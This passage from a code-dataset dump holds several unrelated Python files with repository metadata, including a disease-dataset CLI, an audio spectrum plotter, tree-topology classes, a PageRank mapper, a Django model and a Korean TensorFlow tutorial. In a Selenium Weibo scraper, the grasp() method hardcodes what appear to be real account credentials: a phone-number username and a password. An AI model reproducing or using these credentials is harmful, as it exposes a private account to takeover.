AGAIN!!\")\n full_symptom_table_approach()\n else:\n symptoms_names = [0]*len(dataset_copy.columns[1:])\n for i in range(1 , len(dataset_copy.columns[1:])+1):\n if i in symptoms_to_add:\n symptoms_names[i-1] = 1\n# symptoms_names[i-1] = dataset_copy.columns[1:][i-1]\n return symptoms_names\n\n\ndef add_disease():\n clear()\n disease_to_add = input('Enter the Name of the Disease\\n :: ').title()\n choice_1 = input(f'Do you want to ADD symptoms for {disease_to_add} (Y - YES , X - DISCARD)\\n :: ').upper()\n choice_2 = input('-----------AVAILABLE METHODS-------------\\n\\n 1. First Character Approach\\n 2. FULL SYMPTOM TABLE APPROACH\\n :: ')\n while (choice_1 not in ['Y' , 'X']) or not choice_2.isnumeric():\n clear()\n print('----------Either of the input was INVALID !------------')\n choice_1 = input(f'Do you want to ADD symptoms for {disease_to_add} (Y - YES , X - DISCARD) :: ').upper() or 'Y'\n choice_2 = input('-----------AVAILABLE METHODS-------------\\n\\n 1. First Character Approach\\n 2. FULL SYMPTOM TABLE APPROACH\\n') or '1'\n if choice_1 == 'Y' and choice_2 == '1':\n symptoms_to_add = first_character_approach(disease_to_add)\n if symptoms_to_add.count(1) >= 4:\n dataset_copy.loc[dataset_copy.shape[0]] = [disease_to_add] + symptoms_to_add\n clear()\n print('-------------DISEASE ADDED SUCCESSFULLY-------------')\n else:\n print(f'---------Minimum Five Symptoms essential for Registering {disease_to_add}----------')\n elif choice_1 == 'Y' and choice_2 == '2':\n symptoms_to_add = full_symptom_table_approach()\n if symptoms_to_add.count(1) >= 4:\n dataset_copy.loc[dataset_copy.shape[0]] = [disease_to_add] + symptoms_to_add\n clear()\n print('-------------DISEASE ADDED SUCCESSFULLY-------------')\n else:\n print(f'---------Minimum Five Symptoms essential for Registering {disease_to_add}----------')\n else:\n clear()\n print('-------Disease was DISCARDED---------')\n\n \n\nif __name__ == \"__main__\":\n dirs = os.listdir('Datasets/')\n dirs = dirs[1]\n num = int(re.findall('[0-9]+' , dirs)[0])\n ORIGINAL = os.getcwd() + f'\\Datasets\\SHDPS_Training_{num}.csv'\n DESTINATION = os.getcwd() + f'\\Datasets\\SHDPS_ARCHIVE/SHDPS_Training_{num}(ARCHIVED).csv'\n # dataset = pd.read_csv(ORIGINAL , index_col='prognosis')\n headers = [*pd.read_csv(ORIGINAL, nrows=1)]\n dataset = pd.read_csv(ORIGINAL, usecols=[c for c in headers if c != 'Unnamed: 0'])\n dataset_copy = dataset.copy(deep=True)\n\n while True:\n user_input = input('\\t------------PROGRAM TO ADD DISEASES TO SHDPS DATASET-----------------\\n 1. SEE AVAILABLE SYMPTOMS\\n 2. SEARCH FROM AVAILABLE SYMPTOMS\\n 3. ADD SYMPTOM\\n 4. ADD DISEASE\\n 5. RE-TRAIN ALL ML MODELS\\n 6. SAVE & EXIT\\n :: ')\n if user_input == '1':\n see_symptoms()\n elif user_input == '2':\n search_symptoms()\n elif user_input == '3':\n add_symptom()\n elif user_input == '4':\n add_disease()\n elif user_input == '5':\n train_all_ML_models(dataset_copy=dataset_copy)\n elif user_input == '6':\n save_on_exit(num=num , dataset_copy=dataset_copy)\n else:\n clear()\n print('--------INVALID INPUT-----------')","repo_name":"ubed90/Django_Disease_Prediction_Archived","sub_path":"SHDPS_MODEL_SELECTION/SHDPS_DISEASE_ADDITION.py","file_name":"SHDPS_DISEASE_ADDITION.py","file_ext":"py","file_size_in_byte":10428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"} +{"seq_id":"32482155244","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom pyqtgraph.Qt import QtGui, QtCore\nimport numpy as np\nimport pyqtgraph as pg\nfrom pyqtgraph.ptime import time\nimport pyaudio\nimport sys\nFORMAT = pyaudio.paInt16 # We use 16 bit format per sample\nCHANNELS = 1\nRATE = 44100\n# RATE = 96000 \n# RATE = 48000 \nCHUNK = 1<<10 # 1024 bytes of data read from the buffer\n\napp = QtGui.QApplication([])\n\nwin = pg.GraphicsLayoutWidget(show=True, title=\"Basic plotting examples\")\nwin.resize(1000,600)\nwin.setWindowTitle('pyaudio pyqtgraph')\n\n# p = pg.plot()\np1 = win.addPlot()\np1.setLabel('bottom', 'time', units='sec')\np1.setRange(QtCore.QRectF(0, -1000, CHUNK/RATE, 2000)) \ncurve1 = p1.plot()\ndef makeBox(p):\n p.showAxis('right', show=True)\n p.getAxis('right').setStyle(showValues=False)\n p.showAxis('top', show=True)\n p.getAxis('top').setStyle(showValues=False)\n p.showGrid(x=True, y=True)\nmakeBox(p1)\n\nwin.nextRow()\np = win.addPlot()\np.setTitle('Spectrum')\np.setLabel('bottom', 'frequency', units='Hz')\np.setLogMode(False, True)\np.setRange(QtCore.QRectF(0, 1, RATE/2, 3)) \nmakeBox(p)\ncurve = p.plot()\n\nlastTime = time()\nfps = None\n\ndef update(): \n global curve, data, ptr, p, lastTime, fps, stream\n # Fix program not exitnig on closed window on mac\n if not win.isVisible():\n sys.exit(0)\n done = False\n while not done:\n try:\n in_data = stream.read(CHUNK, True)\n done = True\n except Exception as e:\n # print(e)\n if (e.errno==-9988):\n stream.close()\n init_stream()\n\n data = np.frombuffer(in_data, dtype=np.int16);\n x = np.arange(len(data))/RATE\n y = data\n curve1.setData(x, y, pen='r')\n data = (data-data.mean()) * np.bartlett(len(data))\n D = np.abs(np.fft.rfft(data))\n f = np.arange(len(D))*RATE/CHUNK\n curve.setData(f, D, pen='y')\n\n now = time()\n dt = now - lastTime\n lastTime = now\n if fps is None:\n fps = 1.0/dt\n else:\n s = np.clip(dt*3., 0, 1)\n fps = fps * (1-s) + (1.0/dt) * s\n # p1.setTitle('%0.2f fps' % fps)\n p1.setTitle('%0.2f' % (dt*1000))\n app.processEvents() ## force complete redraw for every plot\n # win.repaint()\n\nif True:\n timer = QtCore.QTimer()\n timer.timeout.connect(update)\n timer.start(0)\n\naudio = pyaudio.PyAudio()\n\n\n# Claim the microphone\ndef init_stream():\n global stream\n\n stream = audio.open(format=FORMAT,\n channels=CHANNELS,\n rate=RATE,\n input_device_index = 1,\n input=True)\n # print(dir(stream))\n stream.start_stream()\ninit_stream()\n\ndef show_devices():\n # audio = pyaudio.PyAudio()\n for i in range(audio.get_device_count()):\n print (i, audio.get_device_info_by_index(i))\n\n## Start Qt event loop unless running in interactive mode.\nif __name__ == '__main__':\n # import sys\n # if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):\n # QtGui.QApplication.instance().exec_()\n app.exec_()\n","repo_name":"saewoonam/audio","sub_path":"sa_old.py","file_name":"sa_old.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"28111389373","text":"#coding:utf-8\nfrom selenium import webdriver\nimport time\n\"\"\"抓取微博24小时热门话题的前15个(http://d.weibo.com/100803?cfs=&Pl_Discover_Pt6Rank__5_filter=hothtlist_type%3D1#_0),\n注意需要翻页,抓取的内容请保存至txt文件中,需要抓取阅读数\"\"\"\nclass HotWeibo_huati_Grasp():\n\tdef __init__(self):\n\t\tself.dr=webdriver.Chrome()\n\t\tself.dr.maximize_window()\n\t\tself.lg_url=\"http://weibo.com/\"\n\t\tself.base_url=\"http://d.weibo.com/100803?cfs=&Pl_Discover_Pt6Rank__5_filter=hothtlist_type%3D1#_0\"\n\tdef by_Name(self,name):\n\t\treturn self.dr.find_element_by_name(name)\n\tdef by_Xpath(self,xpath):\n\t\treturn self.dr.find_element_by_xpath(xpath)\n\tdef by_Xpaths(self,xpath):\n\t\treturn self.dr.find_elements_by_xpath(xpath)\n\tdef login_weibo(self,username,password):\n\t\tself.dr.get(self.lg_url)\n\t\ttime.sleep(3)\n\t\tself.by_Name(\"username\").send_keys(username)\n\t\tself.by_Name(\"password\").send_keys(password)\n\t\tself.by_Xpath(\"//div[@class='info_list login_btn']/a\").click()\n\t\ttime.sleep(3)\n\tdef grasp(self):\n\t\t#调用登录模块\n\t\tself.login_weibo(\"18801340078\",\"wq15803863660\")\n\t\tself.dr.get(self.base_url)\n\t\tlist_=self.by_Xpaths(\"//ul[@class='pt_ul clearfix']//a[@target='_blank']\")\n\t\ttime.sleep(3)\n\t\tfile_=open(\"test.txt\",'w+')\n\t\tread_num=[]\n\t\thot_weibo=[]\n\t\tfor i in list_:\n\t\t\tif \"#\" in i.text:\n\t\t\t\thot_weibo.append(i.text[1:-1]) #热门微博主题列表\n\t\tfor i in self.by_Xpaths(\"//span[@class='number']\"):\n\t\t\tread_num.append(i.text) #热门微博主题阅读量\n\t\t#写入txt文件\n\t\tfor i in range(len(hot_weibo)): \n\t\t\tfile_tianchong=\"\\n********************\\n\"\n\t\t\tfile_.write(hot_weibo[i].encode('utf-8'))\n\t\t\t\n\t\t\tfile_.write(read_num[i].encode('utf-8'))\n\t\t\tfile_.write(file_tianchong)\n\t\tself.dr.quit()\n\t\t\t\nif __name__ == '__main__':\n\tweibo=HotWeibo_huati_Grasp()\n\tweibo.grasp()\n","repo_name":"qwangzone/pachong","sub_path":"hotweibo_huati_grasp.py","file_name":"hotweibo_huati_grasp.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"74364041487","text":"import logging\nimport torch\nimport torch.nn as nn\nimport numpy as np\nfrom dataclasses import dataclass\n\n\n@dataclass\nclass TreeNode:\n index: int\n parent: int\n children: list[int]\n is_leaf: bool\n is_root: bool\n\n\nclass TreeTopologyBase:\n \"\"\" Tree topology\n \"\"\"\n\n @property\n def parent_indices(self):\n raise NotImplementedError\n\n @property\n def children_indices(self):\n raise NotImplementedError\n\n def preorder_traverse(self):\n n_tips = self.n_tips\n root_index = len(self.parent_indices)\n stacks = [root_index]\n parents = self.parent_indices\n children = self.children_indices\n while stacks:\n idx = stacks.pop(0)\n is_leaf = idx < n_tips\n is_root = idx == root_index\n node = TreeNode(index=idx, parent=-1 if is_root else parents[idx], children=children[idx], is_leaf=is_leaf, is_root=is_root)\n yield node\n for ch_idx in children[idx]:\n stacks.append(ch_idx)\n\n def postorder_traverse(self):\n n_tips = self.n_tips\n root_index = len(self.parent_indices)\n stacks = [root_index]\n nodes = []\n parents = self.parent_indices\n children = self.children_indices\n while stacks:\n idx = stacks.pop() # take last\n is_leaf = idx < n_tips\n is_root = idx == root_index\n node = TreeNode(index=idx, parent=-1 if is_root else parents[idx], children=children[idx], is_leaf=is_leaf, is_root=is_root)\n nodes.append(node)\n for ch_idx in children[idx]:\n stacks.append(ch_idx)\n return iter(nodes[::-1])\n\n @property\n def rooted(self):\n raise NotImplementedError\n\n @property\n def n_tips(self):\n raise NotImplementedError\n\n @property\n def n_nodes(self):\n raise NotImplementedError\n\n @property\n def n_branches(self):\n raise NotImplementedError\n\n def as_ete_tree(self, taxon_names=None, branch_lengths=None):\n return convert_to_ete_tree(self, taxon_names=taxon_names, branch_lengths=branch_lengths)\n\n\ndef get_edge_index_tensor(utree: TreeTopologyBase): # torch.Tensor with shape (n_node, 3) # only available for binary utree\n assert not utree.rooted\n edges = [[] for _ in range(utree.n_nodes)]\n for i, idx in enumerate(utree.parent_indices):\n edges[i].append(idx)\n for i, idxs in enumerate(utree.children_indices):\n if idxs:\n edges[i].extend(idxs)\n else:\n edges[i].extend([-1, -1])\n return torch.as_tensor(edges, dtype=torch.long)\n\n\n# Original code from https://github.com/zcrabbit/vbpi-gnn/blob/963045d9568019eeace0d115d41321b51e18d4ce/gnn_branchModel.py#L30-L67\n# Reference: C.Zhang (ICLR 2023)\ndef get_learnable_feature(utree: TreeTopologyBase): # torch.Tensor with shape (n_node,)\n assert not utree.rooted\n n_tips = utree.n_tips\n n_nodes = utree.n_nodes\n leaf_features = torch.eye(n_tips)\n #c = torch.zeros((n_nodes,))\n c = torch.zeros((n_nodes, n_tips))\n d = torch.zeros((n_nodes, n_tips))\n f = torch.zeros((n_nodes, n_tips))\n\n for node in utree.postorder_traverse(): # root node is definitely not a leaf node\n idx = node.index\n #print (node)\n if node.is_leaf:\n #c[idx] = c[idx] #0.\n d[idx] = leaf_features[idx]\n else:\n ch_c_sum = c[node.children].sum(dim=0)\n ch_d_sum = d[node.children].sum(dim=0)\n c[idx] = 1./(3. - ch_c_sum)\n d[idx] = c[idx] * ch_d_sum\n\n for node in utree.preorder_traverse():\n idx = node.index\n if not node.is_root:\n d[idx] = c[idx] * d[node.parent] + d[idx]\n #f[idx] = d[idx]\n\n return d\n\n\ndef convert_to_ete_tree(tree: TreeTopologyBase, taxon_names=None, use_branch_length=None, branch_lengths=None):\n import ete3\n if taxon_names is None:\n taxon_names = [str(i+1) for i in range(tree.n_tips)]\n assert len(taxon_names) == tree.n_tips, taxon_names\n taxons = dict(enumerate(taxon_names)) # index to taxon name\n if branch_lengths is None:\n if use_branch_length is None:\n use_branch_length = isinstance(tree, TreeMetricBase)\n if use_branch_length:\n ch_blens = tree.branch_lengths.detach().cpu().numpy()\n else:\n ch_blens = None\n else:\n ch_blens = branch_lengths.detach().cpu().numpy()\n\n root_idx = max(tree.parent_indices)\n ete_root = ete3.Tree()\n idx_ete_nodes = {root_idx: ete_root}\n\n for node in tree.preorder_traverse():\n if node.is_leaf:\n continue\n ete_node = idx_ete_nodes.pop(node.index)\n for ch_idx in node.children:\n name = taxons.get(ch_idx)\n props = {'name': name}\n if ch_blens is not None:\n props['dist'] = ch_blens[ch_idx]\n ete_ch_node = ete_node.add_child(**props)\n if name is None: # internal\n idx_ete_nodes[ch_idx] = ete_ch_node\n\n return ete_root\n\n\nclass TreeMetricBase(TreeTopologyBase):\n \"\"\" Tree topology and edge lengths\n \"\"\"\n\n @property\n def n_branches(self):\n return self.branch_lengths\n\n @property\n def branch_lengths(self):\n raise NotImplementedError\n\n\nclass TreeMetric(TreeMetricBase):\n @property\n def parent_indices(self):\n return self._parent_indices\n\n @property\n def children_indices(self):\n return self._children_indices\n\n @property\n def n_tips(self):\n return self._n_tips\n\n @property\n def n_nodes(self):\n return self._n_nodes\n\n @property\n def rooted(self):\n return self._rooted\n\n @property\n def branch_lengths(self):\n return self._branch_lengths\n\n def __init__(self, parent_indices, branch_lengths, rooted=True):\n self._parent_indices = np.asarray(parent_indices) # should not be a tensor\n children_indices = [[] for _ in range(len(self._parent_indices) + 1)] # TODO efficiency?\n for idx, pa_idx in enumerate(self._parent_indices):\n children_indices[pa_idx].append(idx)\n self._children_indices = children_indices\n self._n_tips = min(self._parent_indices)\n self._n_nodes = len(self._parent_indices) + 1\n self._branch_lengths = torch.as_tensor(branch_lengths)\n self._rooted = rooted\n\n def get_unrooted(self):\n assert self.rooted, 'only apply once to binary rooted tree'\n root_idx = max(self.parent_indices) # list\n assert self.parent_indices[-1] == root_idx # the last parent idx should be the current root\n new_root_idx = root_idx - 1\n root_child_idxs = np.arange(len(self.parent_indices))[self.parent_indices == root_idx]\n assert len(root_child_idxs) == 2, (root_child_idxs, root_idx, self.parent_indices, self.parent_indices == root_idx)\n new_branch_lengths = self.branch_lengths[:-1].clone().detach()\n new_branch_lengths[root_child_idxs[0]] = self.branch_lengths[root_child_idxs].sum() # merge blens values to new_root\n new_parent_indices = self.parent_indices[:-1]\n new_parent_indices[root_child_idxs[0]] = new_root_idx\n #new_parent_indices = [min(i, new_root_idx) for i in self.parent_indices[:-1]]\n return self.__class__(parent_indices=new_parent_indices, branch_lengths=new_branch_lengths, rooted=False)\n\n def clone(self, branch_lengths=None):\n blens = self.branch_lengths if branch_lengths is None else branch_lengths\n assert len(blens) == len(self.branch_lengths)\n return self.__class__(parent_indices=self.parent_indices, branch_lengths=blens, rooted=self.rooted)\n\n\nclass TipEmbedBase:\n \"\"\"\n - coord (N, d)\n \"\"\"\n def detach(self):\n raise NotImplementedError\n\n\nclass TipEmbedModelBase(nn.Module):\n @property\n def state_size(self) -> torch.Size:\n raise NotImplementedError\n\n @torch.no_grad()\n def sample_embeds(self, mc_samples=1):\n return self.rsample_embeds(mc_samples=mc_samples)\n\n def rsample_embeds(self, mc_samples=1):\n raise NotImplementedError\n\n def log_prior(self, embed: TipEmbedBase):\n raise NotImplementedError\n\n def get_mean_distance_matrix(self):\n return self.mean_distance_matrix\n\n\nclass CondEmbedModelBase(nn.Module):\n \"\"\"\n \"\"\"\n def get_log_prob(self, embed: TipEmbedBase, utree_metric: TreeMetricBase):\n \"\"\"\n Returns log p(tip_embed | utree_metric)\n \"\"\"\n raise NotImplementedError\n","repo_name":"m1m0r1/geophy","sub_path":"geophy/embeddings/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":8547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"7463237201","text":"#!/usr/bin/env python\n\n\n__license__ = 'GPL v3'\n__copyright__ = '2012, Kovid Goyal '\n__docformat__ = 'restructuredtext en'\n\nimport sys, os, shutil\n\nfrom calibre.ebooks.mobi.debug.headers import MOBIFile\nfrom calibre.ebooks.mobi.debug.mobi6 import inspect_mobi as inspect_mobi6\nfrom calibre.ebooks.mobi.debug.mobi8 import inspect_mobi as inspect_mobi8\n\n\ndef inspect_mobi(path_or_stream, ddir=None): # {{{\n stream = (path_or_stream if hasattr(path_or_stream, 'read') else\n open(path_or_stream, 'rb'))\n f = MOBIFile(stream)\n if ddir is None:\n ddir = 'decompiled_' + os.path.splitext(os.path.basename(stream.name))[0]\n try:\n shutil.rmtree(ddir)\n except:\n pass\n os.makedirs(ddir)\n if f.kf8_type is None:\n inspect_mobi6(f, ddir)\n elif f.kf8_type == 'joint':\n p6 = os.path.join(ddir, 'mobi6')\n os.mkdir(p6)\n inspect_mobi6(f, p6)\n p8 = os.path.join(ddir, 'mobi8')\n os.mkdir(p8)\n inspect_mobi8(f, p8)\n else:\n inspect_mobi8(f, ddir)\n\n print('Debug data saved to:', ddir)\n\n# }}}\n\n\ndef main():\n inspect_mobi(sys.argv[1])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"kovidgoyal/calibre","sub_path":"src/calibre/ebooks/mobi/debug/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":17176,"dataset":"github-code","pt":"65"} +{"seq_id":"9026199834","text":"#!/usr/bin/env python\n\nimport sys\n\nrankFormat = '%s\\t%s\\n'\nnodeFormat = '%s\\t,%s\\n'\nrankPrevFormat = 'RP\\t%s,%s\\n'\n\ndef read_input(f):\n for line in iter(f.readline, ''):\n yield line.rstrip('\\n').split('\\t', 1)\n\ndef main():\n for (key, value) in read_input(sys.stdin):\n\n # key.startswith('FinalRank:')\n if key[0] == 'F':\n # Remove tag\n rank = key[10:]\n\n nodeid = value\n\n if rank == '':\n sys.stdout.write('%s\\tF\\n' % (nodeid, ))\n else:\n sys.stdout.write('%s\\tF,%s\\n' % (nodeid, rank))\n\n # key.startswith('NodeId:')\n elif key[0] == 'N':\n # Remove tag\n nodeid = key[7:]\n\n # Take all neighbors as one string in attr[2], if there are any\n attr = value.split(\",\", 2)\n\n rankCurr = float(attr[0])\n\n # Current PR for later reference\n sys.stdout.write('%s\\tR,%s\\n' % (nodeid, attr[0]))\n\n if len(attr) == 2:\n # No outgoint edges so give all PR to itself\n sys.stdout.write(rankFormat % (nodeid, attr[0]))\n else:\n # Get neighbors as a list\n neighbors = attr[2].split(',')\n\n # Divide current PR into (degree) equal pieces\n rankToGive = rankCurr / len(neighbors)\n\n # Emit its neighbors in order to glue them back later\n sys.stdout.write('%s\\tE,%s\\n' % (nodeid, attr[2]))\n\n # For each neighbor, emit PR\n sys.stdout.write(''.join([rankFormat % (nb, rankToGive) for nb in neighbors]))\n\nif __name__ == '__main__':\n main()\n","repo_name":"yingyuho/rankmaniac","sub_path":"data/pagerank_map.py","file_name":"pagerank_map.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"15705069096","text":"#!/usr/bin python3\n\n# Imports\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Python:\n\n# 3rd party:\nfrom django.utils.translation import gettext as _\nfrom django.db import models\n\nfrom django_multitenant import mixins as mt_mixins\nfrom django_multitenant import models as mt_models\nfrom django_multitenant import fields as mt_fields\n\n# Internal: \nfrom .data import MetricReference\nfrom .fields import VarCharField\nfrom ..utils.default_generators import generate_unique_id\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n__all__ = [\n 'MetricETLReference'\n]\n\n\nclass MetricETLReference(models.Model):\n id = VarCharField(\n verbose_name=_(\"unique ID\"),\n max_length=36,\n primary_key=True,\n default=generate_unique_id\n )\n metric = models.OneToOneField(\n MetricReference,\n to_field='metric',\n db_column='metric_id',\n null=False,\n blank=False,\n on_delete=models.CASCADE\n )\n missing_to_zero = models.BooleanField(\n null=False,\n blank=False,\n default=False\n )\n fill_forward = models.BooleanField(\n null=False,\n blank=False,\n default=False\n )\n negative_to_zero = models.BooleanField(\n null=False,\n blank=False,\n default=False\n )\n prevalence_rate = models.BooleanField(\n null=False,\n blank=False,\n default=False\n )\n incidence_rate = models.BooleanField(\n null=False,\n blank=False,\n default=False\n )\n ratio_to_percentage = models.BooleanField(\n null=False,\n blank=False,\n default=False\n )\n rolling_sum_direction = models.BooleanField(\n null=False,\n blank=False,\n default=False\n )\n\n class Meta:\n managed = False\n db_table = 'covid19\".\"metric_etl_reference'\n verbose_name = _(\"ETL Metric\")\n verbose_name_plural = _(\"ETL Metrics\")\n","repo_name":"UKHSA-Internal/coronavirus-dashboard-management","sub_path":"app/service_admin/models/etl_metrics.py","file_name":"etl_metrics.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"42819160810","text":"import json\r\nimport os\r\nimport tensorflow as tf\r\n\r\nfrom recording import Recorder\r\nfrom preprocessing import EmptyFrameRemover\r\nfrom predict import Predictor\r\n\r\nfrom model import KeyModel\r\n\r\nminecraft_json = 'D:/Python Projects/gameBot/saves/minecraft.json'\r\nrecorded_csv = 'D:/Python Projects/gameBot/recording output/minecraft_gameplay.csv'\r\nrecorded_avi = 'D:/Python Projects/gameBot/recording output/minecraft_gameplay.avi'\r\nprocessed_csv = 'D:/Python Projects/gameBot/processed output/minecraft_gameplay.csv'\r\nprocessed_avi = 'D:/Python Projects/gameBot/processed output/minecraft_gameplay.avi'\r\n\r\nminecraft_all_keys = ('1', '2', '3', '4', '5', '6', '7', '8', '9',\r\n 'space', 'w', 'a', 's', 'd', 'e', 'shift',\r\n 'lmouse', 'rmouse')\r\n\r\ntree_farm_keys = ('1', '2', '3',\r\n # 'w', 'a', 's', 'd',\r\n # 'e', 'shift',\r\n 'lmouse', 'rmouse')\r\n\r\nbasic_keys = ('w', 'a', 's', 'd', 'lmouse', 'rmouse')\r\nwasd = ('w', 'a', 's', 'd')\r\n\r\n\r\ndef generate_column_names(keys):\r\n cols = []\r\n for key in keys:\r\n cols.append(key + '_press')\r\n cols.append(key + '_release')\r\n return cols\r\n\r\n\r\ndef build_dataset(record_seconds):\r\n recorder = Recorder(recorded_csv, recorded_avi, tree_farm_keys)\r\n recorder.run(minecraft_json, record_seconds)\r\n recorder.quit()\r\n print('successfully recorded video')\r\n\r\n efr = EmptyFrameRemover(minecraft_json)\r\n # Clean up json read/write in EmptyFrameRemover\r\n efr.remove_empty_frames(processed_csv, processed_avi, .05, generate_column_names(tree_farm_keys))\r\n print('successfully removed empty frames')\r\n\r\n\r\ndef build_model():\r\n km = KeyModel(json_address=minecraft_json,\r\n initial_learn_rate=.01,\r\n epochs=10,\r\n batch_size=48,\r\n keys=generate_column_names(tree_farm_keys),\r\n mouse=True)\r\n\r\n km.build_model(model_address=\"D:/Python Projects/gameBot/models/tree_farm\", batch_length_multiplier=3)\r\n\r\n\r\ndef make_predictions():\r\n predictor = Predictor(model_address='D:/Python Projects/gameBot/models/tree_farm',\r\n json_address=minecraft_json)\r\n predictor.run_predictions()\r\n\r\n\r\nmake_predictions()","repo_name":"retropleinad/game-bot","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"1820763070","text":"# 기본 분류: 의류 이미지 분류\n\n# 이 튜토리얼에서는 운동화나 셔츠 같은 옷 이미지를 분류하는 신경망 모델을 훈련합니다.\n# 상세 내용을 모두 이해하지 못해도 괜찮습니다. \n# 여기서는 완전한 텐서플로(TensorFlow) 프로그램을 빠르게 살펴 보겠습니다. \n# 자세한 내용은 앞으로 배우면서 더 설명합니다.\n\n# 여기에서는 텐서플로 모델을 만들고 훈련할 수 있는 고수준 API인 tf.keras를 사용합니다.\n\n# TensorFlow and tf.keras\nimport tensorflow as tf\n\n# Helper libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nprint(tf.__version__)\n\n# 패션 MNIST 데이터셋 임포트하기\n# 10개의 범주(category)와 70,000개의 흑백 이미지로 구성된 패션 MNIST 데이터셋을 사용하겠습니다.\n# 이미지는 해상도(28x28 픽셀)가 낮고 다음처럼 개별 옷 품목을 나타냅니다:\n\n# 패션 MNIST는 컴퓨터 비전 분야의 \"Hello, World\" 프로그램격인 고전 MNIST 데이터셋을 \n# 대신해서 자주 사용됩니다.\n# MNIST 데이터셋은 손글씨 숫자(0, 1, 2 등)의 이미지로 이루어져 있습니다. \n# 여기서 사용하려는 옷 이미지와 동일한 포맷입니다.\n\n# 패션 MNIST는 일반적인 MNIST 보다 조금 더 어려운 문제이고 다양한 예제를 만들기 위해 \n# 선택했습니다. \n# 두 데이터셋은 비교적 작기 때문에 알고리즘의 작동 여부를 확인하기 위해 사용되곤 합니다.\n# 코드를 테스트하고 디버깅하는 용도로 좋습니다.\n\n# 여기에서 60,000개의 이미지를 사용하여 네트워크를 훈련하고 10,000개의 이미지를 \n# 사용하여 네트워크에서 이미지 분류를 학습한 정도를 평가합니다. \n# TensorFlow에서 직접 Fashion MNIST에 액세스할 수 있습니다.\n# TensorFlow에서 ���접 Fashion MNIST 데이터를 가져오고 로드합니다.\n\nfashion_mnist = tf.keras.datasets.fashion_mnist\n\n(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()\n\n\n# load_data() 함수를 호출하면 네 개의 넘파이(NumPy) 배열이 반환됩니다:\n# - train_images와 train_labels 배열은 모델 학습에 사용되는 훈련 세트입니다.\n# - test_images와 test_labels 배열은 모델 테스트에 사용되는 테스트 세트입니다.\n# 이미지는 28x28 크기의 넘파이 배열이고 픽셀 값은 0과 255 사이입니다.\n# 레이블(label)은 0에서 9까지의 정수 배열입니다.\n# 이 값은 이미지에 있는 옷의 클래스(class)를 나타냅니다:\n\n# 각 이미지는 하나의 레이블에 매핑되어 있습니다.\n# 데이터셋에 클래스 이름이 들어있지 않기 때문에 나중에 이미지를 출력할 때 사용하기 위해 \n# 별도의 변수를 만들어 저장합니다:\n\nclass_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',\n 'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']\n\n# 데이터 탐색\n# 모델을 훈련하기 전에 데이터셋 구조를 살펴보죠.\n# 다음 코드는 훈련 세트에 60,000개의 이미지가 있다는 것을 보여줍니다.\n# 각 이미지는 28x28 픽셀로 표현됩니다:\n\ntrain_images.shape\n# (60000, 28, 28)\n\n# 비슷하게 훈련 세트에는 60,000개의 레이블이 있습니다:\nlen(train_labels)\n# 60000\n\n# 각 레이블은 0과 9사이의 정수입니다:\ntrain_labels\n# array([9, 0, 0, ..., 3, 0, 5], dtype=uint8)\n\n# 테스트 세트에는 10,000개의 이미지가 있습니다. 이 이미지도 28x28 픽셀로 표현됩니다:\ntest_images.shape\n# (10000, 28, 28)\n\n# 테스트 세트는 10,000개의 이미지에 대한 레이블을 가지고 있습니다:\nlen(test_labels)\n# 10000\n\n# 데이터 전처리\n# 네트워크를 훈련하기 전에 데이터를 전처리해야 합니다.\n# 훈련 세트에 있는 첫 번째 이미지를 보면 픽셀 값의 범위가 0~255 사이라는 것을 알 수 있습니다:\n\nplt.figure()\nplt.imshow(train_images[0])\nplt.colorbar()\nplt.grid(False)\nplt.show()\n\n# 신경망 모델에 주입하기 전에 이 값의 범위를 0~1 사이로 조정하겠습니다.\n# 이렇게 하려면 255로 나누어야 합니다.\n# 훈련 세트와 테스트 세트를 동일한 방식으로 전처리하는 것이 중요합니다:\n\ntrain_images = train_images / 255.0\ntest_images = test_images / 255.0\n\n# 훈련 세트에서 처음 25개 이미지와 그 아래 클래스 이름을 출력해 보죠.\n# 데이터 포맷이 올바른지 확인하고 네트워크 구성과 훈련할 준비를 마칩니다.\nplt.figure(figsize=(10,10))\nfor i in range(25):\n plt.subplot(5,5,i+1)\n plt.xticks([])\n plt.yticks([])\n plt.grid(False)\n plt.imshow(train_images[i], cmap=plt.cm.binary)\n plt.xlabel(class_names[train_labels[i]])\n plt.subplot(5,5,i+1).xaxis.label.set_color('gray')\nplt.show()\n\n# 모델 구성\n# 신경망 모델을 만들려면 모델의 층을 구성한 다음 모델을 컴파일합니다.\n\n# 층 설정\n# 신경망의 기본 빌딩 블록은 레이어 입니다.\n# 레이어는 레이어에 공급된 데이터로부터 표현을 추출합니다.\n# 이러한 표현은 당면한 문제에 의미가 있어야 합니다.\n\n# 대부분 딥러닝은 간단한 층을 연결하여 